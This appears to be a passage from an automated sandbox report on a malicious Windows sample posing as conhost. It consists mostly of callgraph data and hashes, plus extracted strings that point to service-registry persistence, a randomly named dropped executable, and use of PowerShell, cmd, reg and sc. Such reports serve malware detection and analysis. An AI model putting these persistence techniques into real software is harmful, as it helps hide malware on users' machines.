2185 14000349c 2183->2185 2184->2185 2187 140003486 wcslen 2184->2187 2186 140003561 wcscpy wcscat 2185->2186 2189 140003593 2186->2189 2187->2184 2187->2185 2188 1400035e3 wcscpy wcscat 2191 140003619 2188->2191 2189->2188 2190 14000372e wcscpy wcscat 2193 140003767 2190->2193 2191->2190 2192 140003ac4 wcslen 2194 140003ad2 2192->2194 2195 140003b0b 2192->2195 2193->2192 2194->2195 2197 140003af6 wcslen 2194->2197 2196 140003c1a wcscpy wcscat 2195->2196 2199 140003c4f 2196->2199 2197->2194 2197->2195 2198 140003c9f wcscpy wcscat 2201 140003cd8 2198->2201 2199->2198 2200 140003d15 wcscpy wcscat 2203 140003d5c 2200->2203 2201->2200 2202 140003dae wcscpy wcscat wcslen 2385 14000146d 2202->2385 2203->2202 2208 140003ec5 2471 1400014a9 2208->2471 2209 140004008 2211 14000145e 2 API calls 2209->2211 2217 140003f5c 2211->2217 2213 140005707 2214 140003ff7 2218 14000145e 2 API calls 2214->2218 2216 14000409a wcscpy wcscat wcslen 2236 140004170 2216->2236 2217->2213 2217->2216 2218->2217 2220 140003f50 2222 14000145e 2 API calls 2220->2222 2222->2217 2223 140004265 wcslen 2224 14000153f 2 API calls 2223->2224 2224->2236 2225 14000532a memcpy 2225->2236 2226 14000445b wcslen 2632 14000157b 2226->2632 2227 1400046cd wcslen 2229 14000153f 2 API calls 2227->2229 2229->2236 2230 140004fc1 wcscpy wcscat wcslen 2231 140001422 2 API calls 2230->2231 2231->2236 2233 140004553 wcslen 2649 1400015a8 2233->2649 2236->2223 2236->2225 2236->2226 2236->2227 2236->2230 2236->2233 2237 140005103 2236->2237 2238 14000548c memcpy 2236->2238 2239 1400026e0 9 API calls 2236->2239 2240 1400051ae wcslen 2236->2240 2242 140004e15 wcscpy wcscat wcslen 2236->2242 2244 14000145e NtQueryAttributesFile malloc 2236->2244 2587 1400014d6 2236->2587 2660 140001521 2236->2660 2758 140001431 2236->2758 2237->2153 2238->2236 2239->2236 2241 1400015a8 2 API calls 2240->2241 2241->2236 2689 140001422 2242->2689 2244->2236 2246 140001394 2 API calls 2245->2246 2247 14000154e 2246->2247 2248 140001394 2 API calls 2247->2248 2249 14000155d 2248->2249 2250 140001394 2 API calls 2249->2250 2251 14000156c 2250->2251 2252 140001394 2 API calls 2251->2252 2253 14000157b 2252->2253 2254 140001394 2 API calls 2253->2254 2255 14000158a 2254->2255 2256 140001394 2 API calls 2255->2256 2257 140001599 2256->2257 2258 140001394 2 API calls 2257->2258 2259 1400015a8 2258->2259 2260 140001394 2 API calls 2259->2260 2261 1400015b7 2260->2261 2262 140001394 2 API calls 2261->2262 2263 1400015c6 2262->2263 2264 140001394 2 API calls 2263->2264 2265 1400015d5 2264->2265 2266 140001394 2 API calls 2265->2266 2267 1400015e4 2266->2267 2268 140001394 2 API calls 2267->2268 2269 1400015f3 2268->2269 2269->2176 2270 140001503 2269->2270 2271 140001394 2 API calls 2270->2271 2272 14000150d 2271->2272 2273 140001394 2 API calls 2272->2273 2274 140001512 2273->2274 2275 140001394 2 API calls 2274->2275 2276 140001521 2275->2276 2277 140001394 2 API calls 2276->2277 2278 140001530 2277->2278 2279 140001394 2 API calls 2278->2279 2280 14000153f 2279->2280 2281 140001394 2 API calls 2280->2281 2282 14000154e 2281->2282 2283 140001394 2 API calls 2282->2283 2284 14000155d 2283->2284 2285 140001394 2 API calls 2284->2285 2286 14000156c 2285->2286 2287 140001394 2 API calls 2286->2287 2288 14000157b 2287->2288 2289 140001394 2 API calls 2288->2289 2290 14000158a 2289->2290 2291 140001394 2 API calls 2290->2291 2292 140001599 2291->2292 2293 140001394 2 API calls 2292->2293 2294 1400015a8 2293->2294 2295 140001394 2 API calls 2294->2295 2296 1400015b7 2295->2296 2297 140001394 2 API calls 2296->2297 2298 1400015c6 2297->2298 2299 140001394 2 API calls 2298->2299 2300 1400015d5 2299->2300 2301 140001394 2 API calls 2300->2301 2302 1400015e4 2301->2302 2303 140001394 2 API calls 2302->2303 2304 1400015f3 2303->2304 2304->2182 2305 14000156c 2304->2305 2306 140001394 2 API calls 2305->2306 2307 14000157b 2306->2307 2308 140001394 2 API calls 2307->2308 2309 14000158a 2308->2309 2310 140001394 2 API calls 2309->2310 2311 140001599 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015a8 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015b7 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015c6 2316->2317 2318 140001394 2 API calls 2317->2318 2319 1400015d5 2318->2319 2320 140001394 2 API calls 2319->2320 2321 1400015e4 2320->2321 2322 140001394 2 API calls 2321->2322 2323 1400015f3 2322->2323 2323->2182 2324 14000145e 2323->2324 2325 140001394 2 API calls 2324->2325 2326 14000146d 2325->2326 2327 140001394 2 API calls 2326->2327 2328 14000147c 2327->2328 2329 140001394 2 API calls 2328->2329 2330 14000148b 2329->2330 2331 140001394 2 API calls 2330->2331 2332 14000149a 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400014a9 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400014b8 2335->2336 2337 140001394 2 API calls 2336->2337 2338 1400014c7 2337->2338 2339 140001394 2 API calls 2338->2339 2340 1400014d6 2339->2340 2341 1400014e5 2340->2341 2342 140001394 2 API calls 2340->2342 2343 140001394 2 API calls 2341->2343 2342->2341 2344 1400014ef 2343->2344 2345 1400014f4 2344->2345 2346 140001394 2 API calls 2344->2346 2347 140001394 2 API calls 2345->2347 2346->2345 2348 1400014fe 2347->2348 2349 140001503 2348->2349 2350 140001394 2 API calls 2348->2350 2351 140001394 2 API calls 2349->2351 2350->2349 2352 14000150d 2351->2352 2353 140001394 2 API calls 2352->2353 2354 140001512 2353->2354 2355 140001394 2 API calls 2354->2355 2356 140001521 2355->2356 2357 140001394 2 API calls 2356->2357 2358 140001530 2357->2358 2359 140001394 2 API calls 2358->2359 2360 14000153f 2359->2360 2361 140001394 2 API calls 2360->2361 2362 14000154e 2361->2362 2363 140001394 2 API calls 2362->2363 2364 14000155d 2363->2364 2365 140001394 2 API calls 2364->2365 2366 14000156c 2365->2366 2367 140001394 2 API calls 2366->2367 2368 14000157b 2367->2368 2369 140001394 2 API calls 2368->2369 2370 14000158a 2369->2370 2371 140001394 2 API calls 2370->2371 2372 140001599 2371->2372 2373 140001394 2 API calls 2372->2373 2374 1400015a8 2373->2374 2375 140001394 2 API calls 2374->2375 2376 1400015b7 2375->2376 2377 140001394 2 API calls 2376->2377 2378 1400015c6 2377->2378 2379 140001394 2 API calls 2378->2379 2380 1400015d5 2379->2380 2381 140001394 2 API calls 2380->2381 2382 1400015e4 2381->2382 2383 140001394 2 API calls 2382->2383 2384 1400015f3 2383->2384 2384->2182 2386 140001394 2 API calls 2385->2386 2387 14000147c 2386->2387 2388 140001394 2 API calls 2387->2388 2389 14000148b 2388->2389 2390 140001394 2 API calls 2389->2390 2391 14000149a 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400014a9 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400014b8 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400014c7 2396->2397 2398 140001394 2 API calls 2397->2398 2399 1400014d6 2398->2399 2400 1400014e5 2399->2400 2401 140001394 2 API calls 2399->2401 2402 140001394 2 API calls 2400->2402 2401->2400 2403 1400014ef 2402->2403 2404 1400014f4 2403->2404 2405 140001394 2 API calls 2403->2405 2406 140001394 2 API calls 2404->2406 2405->2404 2407 1400014fe 2406->2407 2408 140001503 2407->2408 2409 140001394 2 API calls 2407->2409 2410 140001394 2 API calls 2408->2410 2409->2408 2411 14000150d 2410->2411 2412 140001394 2 API calls 2411->2412 2413 140001512 2412->2413 2414 140001394 2 API calls 2413->2414 2415 140001521 2414->2415 2416 140001394 2 API calls 2415->2416 2417 140001530 2416->2417 2418 140001394 2 API calls 2417->2418 2419 14000153f 2418->2419 2420 140001394 2 API calls 2419->2420 2421 14000154e 2420->2421 2422 140001394 2 API calls 2421->2422 2423 14000155d 2422->2423 2424 140001394 2 API calls 2423->2424 2425 14000156c 2424->2425 2426 140001394 2 API calls 2425->2426 2427 14000157b 2426->2427 2428 140001394 2 API calls 2427->2428 2429 14000158a 2428->2429 2430 140001394 2 API calls 2429->2430 2431 140001599 2430->2431 2432 140001394 2 API calls 2431->2432 2433 1400015a8 2432->2433 2434 140001394 2 API calls 2433->2434 2435 1400015b7 2434->2435 2436 140001394 2 API calls 2435->2436 2437 1400015c6 2436->2437 2438 140001394 2 API calls 2437->2438 2439 1400015d5 2438->2439 2440 140001394 2 API calls 2439->2440 2441 1400015e4 2440->2441 2442 140001394 2 API calls 2441->2442 2443 1400015f3 2442->2443 2443->2217 2444 140001530 2443->2444 2445 140001394 2 API calls 2444->2445 2446 14000153f 2445->2446 2447 140001394 2 API calls 2446->2447 2448 14000154e 2447->2448 2449 140001394 2 API calls 2448->2449 2450 14000155d 2449->2450 2451 140001394 2 API calls 2450->2451 2452 14000156c 2451->2452 2453 140001394 2 API calls 2452->2453 2454 14000157b 2453->2454 2455 140001394 2 API calls 2454->2455 2456 14000158a 2455->2456 2457 140001394 2 API calls 2456->2457 2458 140001599 2457->2458 2459 140001394 2 API calls 2458->2459 2460 1400015a8 2459->2460 2461 140001394 2 API calls 2460->2461 2462 1400015b7 2461->2462 2463 140001394 2 API calls 2462->2463 2464 1400015c6 2463->2464 2465 140001394 2 API calls 2464->2465 2466 1400015d5 2465->2466 2467 140001394 2 API calls 2466->2467 2468 1400015e4 2467->2468 2469 140001394 2 API calls 2468->2469 2470 1400015f3 2469->2470 2470->2208 2470->2209 2472 140001394 2 API calls 2471->2472 2473 1400014b8 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400014c7 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400014d6 2476->2477 2478 1400014e5 2477->2478 2479 140001394 2 API calls 2477->2479 2480 140001394 2 API calls 2478->2480 2479->2478 2481 1400014ef 2480->2481 2482 1400014f4 2481->2482 2483 140001394 2 API calls 2481->2483 2484 140001394 2 API calls 2482->2484 2483->2482 2485 1400014fe 2484->2485 2486 140001503 2485->2486 2487 140001394 2 API calls 2485->2487 2488 140001394 2 API calls 2486->2488 2487->2486 2489 14000150d 2488->2489 2490 140001394 2 API calls 2489->2490 2491 140001512 2490->2491 2492 140001394 2 API calls 2491->2492 2493 140001521 2492->2493 2494 140001394 2 API calls 2493->2494 2495 140001530 2494->2495 2496 140001394 2 API calls 2495->2496 2497 14000153f 2496->2497 2498 140001394 2 API calls 2497->2498 2499 14000154e 2498->2499 2500 140001394 2 API calls 2499->2500 2501 14000155d 2500->2501 2502 140001394 2 API calls 2501->2502 2503 14000156c 2502->2503 2504 140001394 2 API calls 2503->2504 2505 14000157b 2504->2505 2506 140001394 2 API calls 2505->2506 2507 14000158a 2506->2507 2508 140001394 2 API calls 2507->2508 2509 140001599 2508->2509 2510 140001394 2 API calls 2509->2510 2511 1400015a8 2510->2511 2512 140001394 2 API calls 2511->2512 2513 1400015b7 2512->2513 2514 140001394 2 API calls 2513->2514 2515 1400015c6 2514->2515 2516 140001394 2 API calls 2515->2516 2517 1400015d5 2516->2517 2518 140001394 2 API calls 2517->2518 2519 1400015e4 2518->2519 2520 140001394 2 API calls 2519->2520 2521 1400015f3 2520->2521 2521->2214 2522 140001440 2521->2522 2523 140001394 2 API calls 2522->2523 2524 14000144f 2523->2524 2525 140001394 2 API calls 2524->2525 2526 14000145e 2525->2526 2527 140001394 2 API calls 2526->2527 2528 14000146d 2527->2528 2529 140001394 2 API calls 2528->2529 2530 14000147c 2529->2530 2531 140001394 2 API calls 2530->2531 2532 14000148b 2531->2532 2533 140001394 2 API calls 2532->2533 2534 14000149a 2533->2534 2535 140001394 2 API calls 2534->2535 2536 1400014a9 2535->2536 2537 140001394 2 API calls 2536->2537 2538 1400014b8 2537->2538 2539 140001394 2 API calls 2538->2539 2540 1400014c7 2539->2540 2541 140001394 2 API calls 2540->2541 2542 1400014d6 2541->2542 2543 1400014e5 2542->2543 2544 140001394 2 API calls 2542->2544 2545 140001394 2 API calls 2543->2545 2544->2543 2546 1400014ef 2545->2546 2547 1400014f4 2546->2547 2548 140001394 2 API calls 2546->2548 2549 140001394 2 API calls 2547->2549 2548->2547 2550 1400014fe 2549->2550 2551 140001503 2550->2551 2552 140001394 2 API calls 2550->2552 2553 140001394 2 API calls 2551->2553 2552->2551 2554 14000150d 2553->2554 2555 140001394 2 API calls 2554->2555 2556 140001512 2555->2556 2557 140001394 2 API calls 2556->2557 2558 140001521 2557->2558 2559 140001394 2 API calls 2558->2559 2560 140001530 2559->2560 2561 140001394 2 API calls 2560->2561 2562 14000153f 2561->2562 2563 140001394 2 API calls 2562->2563 2564 14000154e 2563->2564 2565 140001394 2 API calls 2564->2565 2566 14000155d 2565->2566 2567 140001394 2 API calls 2566->2567 2568 14000156c 2567->2568 2569 140001394 2 API calls 2568->2569 2570 14000157b 2569->2570 2571 140001394 2 API calls 2570->2571 2572 14000158a 2571->2572 2573 140001394 2 API calls 2572->2573 2574 140001599 2573->2574 2575 140001394 2 API calls 2574->2575 2576 1400015a8 2575->2576 2577 140001394 2 API calls 2576->2577 2578 1400015b7 2577->2578 2579 140001394 2 API calls 2578->2579 2580 1400015c6 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400015d5 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400015e4 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400015f3 2585->2586 2586->2214 2586->2220 2588 1400014e5 2587->2588 2589 140001394 2 API calls 2587->2589 2590 140001394 2 API calls 2588->2590 2589->2588 2591 1400014ef 2590->2591 2592 1400014f4 2591->2592 2593 140001394 2 API calls 2591->2593 2594 140001394 2 API calls 2592->2594 2593->2592 2595 1400014fe 2594->2595 2596 140001503 2595->2596 2597 140001394 2 API calls 2595->2597 2598 140001394 2 API calls 2596->2598 2597->2596 2599 14000150d 2598->2599 2600 140001394 2 API calls 2599->2600 2601 140001512 2600->2601 2602 140001394 2 API calls 2601->2602 2603 140001521 2602->2603 2604 140001394 2 API calls 2603->2604 2605 140001530 2604->2605 2606 140001394 2 API calls 2605->2606 2607 14000153f 2606->2607 2608 140001394 2 API calls 2607->2608 2609 14000154e 2608->2609 2610 140001394 2 API calls 2609->2610 2611 14000155d 2610->2611 2612 140001394 2 API calls 2611->2612 2613 14000156c 2612->2613 2614 140001394 2 API calls 2613->2614 2615 14000157b 2614->2615 2616 140001394 2 API calls 2615->2616 2617 14000158a 2616->2617 2618 140001394 2 API calls 2617->2618 2619 140001599 2618->2619 2620 140001394 2 API calls 2619->2620 2621 1400015a8 2620->2621 2622 140001394 2 API calls 2621->2622 2623 1400015b7 2622->2623 2624 140001394 2 API calls 2623->2624 2625 1400015c6 2624->2625 2626 140001394 2 API calls 2625->2626 2627 1400015d5 2626->2627 2628 140001394 2 API calls 2627->2628 2629 1400015e4 2628->2629 2630 140001394 2 API calls 2629->2630 2631 1400015f3 2630->2631 2631->2236 2633 140001394 2 API calls 2632->2633 2634 14000158a 2633->2634 2635 140001394 2 API calls 2634->2635 2636 140001599 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015a8 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015b7 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015c6 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015d5 2643->2644 2645 140001394 2 API calls 2644->2645 2646 1400015e4 2645->2646 2647 140001394 2 API calls 2646->2647 2648 1400015f3 2647->2648 2648->2236 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2236 2661 140001394 2 API calls 2660->2661 2662 140001530 2661->2662 2663 140001394 2 API calls 2662->2663 2664 14000153f 2663->2664 2665 140001394 2 API calls 2664->2665 2666 14000154e 2665->2666 2667 140001394 2 API calls 2666->2667 2668 14000155d 2667->2668 2669 140001394 2 API calls 2668->2669 2670 14000156c 2669->2670 2671 140001394 2 API calls 2670->2671 2672 14000157b 2671->2672 2673 140001394 2 API calls 2672->2673 2674 14000158a 2673->2674 2675 140001394 2 API calls 2674->2675 2676 140001599 2675->2676 2677 140001394 2 API calls 2676->2677 2678 1400015a8 2677->2678 2679 140001394 2 API calls 2678->2679 2680 1400015b7 2679->2680 2681 140001394 2 API calls 2680->2681 2682 1400015c6 2681->2682 2683 140001394 2 API calls 2682->2683 2684 1400015d5 2683->2684 2685 140001394 2 API calls 2684->2685 2686 1400015e4 2685->2686 2687 140001394 2 API calls 2686->2687 2688 1400015f3 2687->2688 2688->2236 2690 140001394 2 API calls 2689->2690 2691 140001431 2690->2691 2692 140001394 2 API calls 2691->2692 2693 140001440 2692->2693 2694 140001394 2 API calls 2693->2694 2695 14000144f 2694->2695 2696 140001394 2 API calls 2695->2696 2697 14000145e 2696->2697 2698 140001394 2 API calls 2697->2698 2699 14000146d 2698->2699 2700 140001394 2 API calls 2699->2700 2701 14000147c 2700->2701 2702 140001394 2 API calls 2701->2702 2703 14000148b 2702->2703 2704 140001394 2 API calls 2703->2704 2705 14000149a 2704->2705 2706 140001394 2 API calls 2705->2706 2707 1400014a9 2706->2707 2708 140001394 2 API calls 2707->2708 2709 1400014b8 2708->2709 2710 140001394 2 API calls 2709->2710 2711 1400014c7 2710->2711 2712 140001394 2 API calls 2711->2712 2713 1400014d6 2712->2713 2714 1400014e5 2713->2714 2715 140001394 2 API calls 2713->2715 2716 140001394 2 API calls 2714->2716 2715->2714 2717 1400014ef 2716->2717 2718 1400014f4 2717->2718 2719 140001394 2 API calls 2717->2719 2720 140001394 2 API calls 2718->2720 2719->2718 2721 1400014fe 2720->2721 2722 140001503 2721->2722 2723 140001394 2 API calls 2721->2723 2724 140001394 2 API calls 2722->2724 2723->2722 2725 14000150d 2724->2725 2726 140001394 2 API calls 2725->2726 2727 140001512 2726->2727 2728 140001394 2 API calls 2727->2728 2729 140001521 2728->2729 2730 140001394 2 API calls 2729->2730 2731 140001530 2730->2731 2732 140001394 2 API calls 2731->2732 2733 14000153f 2732->2733 2734 140001394 2 API calls 2733->2734 2735 14000154e 2734->2735 2736 140001394 2 API calls 2735->2736 2737 14000155d 2736->2737 2738 140001394 2 API calls 2737->2738 2739 14000156c 2738->2739 2740 140001394 2 API calls 2739->2740 2741 14000157b 2740->2741 2742 140001394 2 API calls 2741->2742 2743 14000158a 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001599 2744->2745 2746 140001394 2 API calls 2745->2746 2747 1400015a8 2746->2747 2748 140001394 2 API calls 2747->2748 2749 1400015b7 2748->2749 2750 140001394 2 API calls 2749->2750 2751 1400015c6 2750->2751 2752 140001394 2 API calls 2751->2752 2753 1400015d5 2752->2753 2754 140001394 2 API calls 2753->2754 2755 1400015e4 2754->2755 2756 140001394 2 API calls 2755->2756 2757 1400015f3 2756->2757 2757->2236 2759 140001394 2 API calls 2758->2759 2760 140001440 2759->2760 2761 140001394 2 API calls 2760->2761 2762 14000144f 2761->2762 2763 140001394 2 API calls 2762->2763 2764 14000145e 2763->2764 2765 140001394 2 API calls 2764->2765 2766 14000146d 2765->2766 2767 140001394 2 API calls 2766->2767 2768 14000147c 2767->2768 2769 140001394 2 API calls 2768->2769 2770 14000148b 2769->2770 2771 140001394 2 API calls 2770->2771 2772 14000149a 2771->2772 2773 140001394 2 API calls 2772->2773 2774 1400014a9 2773->2774 2775 140001394 2 API calls 2774->2775 2776 1400014b8 2775->2776 2777 140001394 2 API calls 2776->2777 2778 1400014c7 2777->2778 2779 140001394 2 API calls 2778->2779 2780 1400014d6 2779->2780 2781 1400014e5 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014ef 2783->2784 2785 1400014f4 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 1400014fe 2787->2788 2789 140001503 2788->2789 2790 140001394 2 API calls 2788->2790 2791 140001394 2 API calls 2789->2791 2790->2789 2792 14000150d 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001512 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001521 2795->2796 2797 140001394 2 API calls 2796->2797 2798 140001530 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000153f 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000154e 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000155d 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000156c 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000157b 2807->2808 2809 140001394 2 API calls 2808->2809 2810 14000158a 2809->2810 2811 140001394 2 API calls 2810->2811 2812 140001599 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015a8 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015b7 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015c6 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015d5 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015e4 2821->2822 2823 140001394 2 API calls 2822->2823 2824 1400015f3 2823->2824 2824->2236

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_00000001400059E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 74 Function_0000000140001BA0 1->74 2 Function_00000001400014E5 70 Function_0000000140001394 2->70 3 Function_00000001400010F0 4 Function_00000001400057F1 5 Function_00000001400030F1 6 Function_00000001400014F4 6->70 7 Function_0000000140001E00 8 Function_0000000140001800 66 Function_0000000140002290 8->66 9 Function_0000000140002F00 55 Function_0000000140001370 9->55 10 Function_0000000140001000 10->7 38 Function_0000000140001750 10->38 81 Function_0000000140001FB0 10->81 87 Function_0000000140001FC0 10->87 11 Function_0000000140002500 12 Function_0000000140001503 12->70 13 Function_0000000140001404 13->70 14 Function_0000000140002104 15 Function_0000000140001E10 16 Function_0000000140003110 17 Function_0000000140005811 18 Function_0000000140005911 19 Function_0000000140001512 19->70 20 Function_0000000140005D20 46 Function_0000000140005A60 20->46 21 Function_0000000140002420 22 Function_0000000140002320 23 Function_0000000140001521 23->70 24 Function_0000000140001422 24->70 25 Function_0000000140001530 25->70 26 Function_0000000140003130 27 Function_0000000140001431 27->70 28 Function_0000000140005831 29 Function_000000014000153F 29->70 30 Function_0000000140001440 30->70 31 Function_0000000140005A40 32 Function_0000000140001140 47 Function_0000000140001160 32->47 33->66 34 Function_0000000140005741 35 Function_0000000140001F47 54 Function_0000000140001870 35->54 36 Function_0000000140002050 37 Function_0000000140001650 39 Function_0000000140003150 39->9 39->12 39->23 39->24 39->25 39->27 39->29 39->30 43 Function_000000014000145E 39->43 45 Function_0000000140002660 39->45 39->46 51 Function_000000014000156C 39->51 52 Function_000000014000146D 39->52 39->55 60 Function_000000014000157B 39->60 78 Function_00000001400015A8 39->78 79 Function_00000001400014A9 39->79 86 Function_00000001400016C0 39->86 97 Function_00000001400014D6 39->97 100 Function_00000001400026E0 39->100 40 Function_0000000140005851 41 Function_0000000140003051 42 Function_000000014000155D 42->70 43->70 44 Function_0000000140002460 47->39 47->47 47->54 61 Function_0000000140001880 47->61 65 Function_0000000140001F90 47->65 47->86 48 Function_0000000140001760 101 Function_00000001400020E0 48->101 49 Function_0000000140005761 50 Function_0000000140001E65 50->54 51->70 52->70 53 Function_000000014000216F 56 Function_0000000140005A70 56->46 57 Function_0000000140001A70 57->33 57->74 58 Function_0000000140003070 59 Function_0000000140005871 60->70 61->21 61->33 61->45 61->74 62 Function_0000000140005880 63 Function_0000000140005781 64 Function_0000000140005981 67 Function_0000000140002590 68 Function_0000000140003090 69 Function_0000000140002691 70->20 70->56 71 Function_0000000140002194 71->54 72 Function_000000014000219E 73 Function_0000000140001FA0 74->33 80 Function_00000001400023B0 74->80 92 Function_00000001400024D0 74->92 75 Function_00000001400057A1 76 Function_00000001400058A1 77 Function_00000001400059A1 78->70 79->70 82 Function_00000001400022B0 83 Function_00000001400026B0 84 Function_00000001400030B1 85 Function_0000000140001AB3 85->33 85->74 88 Function_00000001400057C1 89 Function_0000000140001AC3 89->33 89->74 90 Function_00000001400014C7 90->70 91 Function_00000001400026D0 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400058D1 96 Function_0000000140001AD4 96->33 96->74 97->70 98 Function_00000001400022E0 99 Function_00000001400017E0 99->101 100->2 100->6 100->12 100->19 100->42 100->43 100->45 100->46 100->55 100->79 100->90

                                                                                Executed Functions

                                                                                Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryAttributesFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFileQuery
                                                                                • String ID:
                                                                                • API String ID: 2106648053-0
                                                                                • Opcode ID: d3facea2ea28090a3b8493860f07dd15fe4672f774124d3d6ce7a42bf765e071
                                                                                • Instruction ID: a6cb4654e9b874847d81667e3afa197bf99ff2b7c8811c1cbfaff09fb0517543
                                                                                • Opcode Fuzzy Hash: d3facea2ea28090a3b8493860f07dd15fe4672f774124d3d6ce7a42bf765e071
                                                                                • Instruction Fuzzy Hash: A2F0AFB2608B408AEA12DF52F89579A77A0F39D7C0F00991ABBC843735DB3CC190CB40

                                                                                Non-executed Functions

                                                                                Function 0000000140003150 Relevance: 82.6, APIs: 36, Strings: 18, Instructions: 1629COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000038.00000002.4158511665.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000038.00000002.4158485355.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158540031.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158565895.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000038.00000002.4158589415.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpy
                                                                                • String ID: $ $ImagePath$PROGRAMDATA=$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\hbjhytnikyzzpqusaewfbxfq$\BaseNamedObjects\kpgqtnbtsnuhiwzk$\BaseNamedObjects\sovalofrro$\Registry\Machine\SYSTEM\CurrentControlSet\Services\HZIWFEGQ$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cjogqihmrmek\mfpmikspvfzi.exe$\cmd.exe$\reg.exe$\sc.exe
                                                                                • API String ID: 295340062-3445116192
                                                                                • Opcode ID: 6bbbb06c539f349cf2e1114d241118a345790d8dd6a16c9c0feef2216d42c330
                                                                                • Instruction ID: 0ef485e3f6bd42e134a4dcdeec3c94709cd9f2879ad2367089269e8f57eb35b6
                                                                                • Opcode Fuzzy Hash: 6bbbb06c539f349cf2e1114d241118a345790d8dd6a16c9c0feef2216d42c330
                                                                                • Instruction Fuzzy Hash: 91234BF1524BC198F723CB2AF8467E56360BB9E3C8F445215FB84676B2EB798285C305
                                                                                Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 317 140002774-14000277a 315->317 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 317->316 320 140002780-140002787 317->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a60 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->317 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 